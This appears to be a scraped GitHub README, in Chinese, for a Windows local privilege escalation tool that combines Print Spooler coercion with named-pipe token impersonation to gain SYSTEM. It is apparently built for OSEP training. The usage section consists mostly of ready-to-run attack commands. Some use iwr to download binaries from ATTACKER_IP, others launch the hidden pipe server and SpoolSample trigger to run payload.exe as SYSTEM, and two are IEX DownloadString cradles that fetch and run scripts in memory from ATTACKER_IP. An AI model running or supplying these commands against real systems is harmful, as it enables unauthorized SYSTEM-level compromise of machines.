totekuh/sharp-printspoofer

GitHub: totekuh/sharp-printspoofer

基于 Print Spooler 强制调用和命名管道模拟的 Windows 本地提权工具,将 SeImpersonatePrivilege 提升至 SYSTEM 权限。

Stars: 0 | Forks: 0

# PrintSpooferLocal 通过命名管道模拟 + Print Spooler 强制调用的本地权限提升。强制 SYSTEM 连接到受控命名管道,模拟令牌,并以 NT AUTHORITY\SYSTEM 权限启动进程。 在 OSEP 期间构建。 ## 构建 需要 `mono-mcs` 和 `python3`(Kali 默认已包含二者)。 ``` make # build everything make assembly # .NET assembly only make loader # PS1 reflective loader only make clean # nuke dist/ ``` 生成文件位于 `dist/`。 ## 使用方法 两个组件协同工作: | 组件 | 角色 | |---|---| | `PrintSpooferLocal.exe` | 命名管道服务器 —— 模拟连接的 SYSTEM 令牌并生成进程 | | `Invoke-SpoolSample.ps1` | 触发器 —— 通过 MS-RPRN 强制 Print Spooler (SYSTEM) 连接到管道 | ### 落地(基于磁盘) #### 1. 上传二进制文件 ``` iwr http://ATTACKER_IP/PrintSpooferLocal.exe -outfile C:\Windows\temp\PrintSpooferLocal.exe iwr http://ATTACKER_IP/SpoolSample.exe -outfile C:\Windows\temp\SpoolSample.exe ``` #### 2. 启动命名管道服务器 ``` Start-Process "C:\windows\temp\PrintSpooferLocal.exe" ` -ArgumentList '--pipe','\\.\pipe\pwn\pipe\spoolss','--cmd','C:\Windows\temp\payload.exe' ` -WindowStyle Hidden ``` 验证其是否正在运行: ``` Get-Process -name printspooferlocal ``` #### 3. 触发后台打印程序强制调用 ``` $h = hostname Start-Process "C:\windows\temp\SpoolSample.exe" ` -ArgumentList $h,"$h/pipe/pwn" ` -WindowStyle Hidden ``` Print Spooler (SYSTEM) 连接到管道。PrintSpooferLocal 模拟令牌并以 SYSTEM 权限执行命令。 ### 反射式(内存中) ``` # Load both cradles IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-PrintSpooferLocal.ps1') IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-SpoolSample.ps1') # Start the pipe server Invoke-PrintSpooferLocal "--pipe \\.\pipe\pwn\pipe\spoolss --cmd C:\Windows\temp\payload.exe" # Trigger coercion Invoke-SpoolSample -Target $env:COMPUTERNAME -CaptureServer "$env:COMPUTERNAME/pipe/pwn" ``` ## 选项 ``` --pipe Named pipe path (e.g., \\.\pipe\pwn\pipe\spoolss) --cmd Command to run as SYSTEM -h, --help Help ``` ## 项目结构 ``` src/ C# sources + C trigger source scripts/ build helpers (PS1 loader generator) vendor/ pre-built loaders (Invoke-SpoolSample.ps1) dist/ build artifacts (gitignored) Makefile build system ```
标签:AI合规, CSharp, CTF学习, MS-RPRN, Named Pipe, OSEP, PE 加载器, PrintSpoofer, Print Spooler, SeImpersonatePrivilege, SpoolSample, SYSTEM权限, Web报告查看器, 代码生成, 令牌模拟, 内网渗透, 协议分析, 协议欺骗, 多人体追踪, 数据展示, 本地提权, 本地漏洞利用, 权限提升, 横向移动, 渗透测试工具, 红队, 编程规范, 逆向工具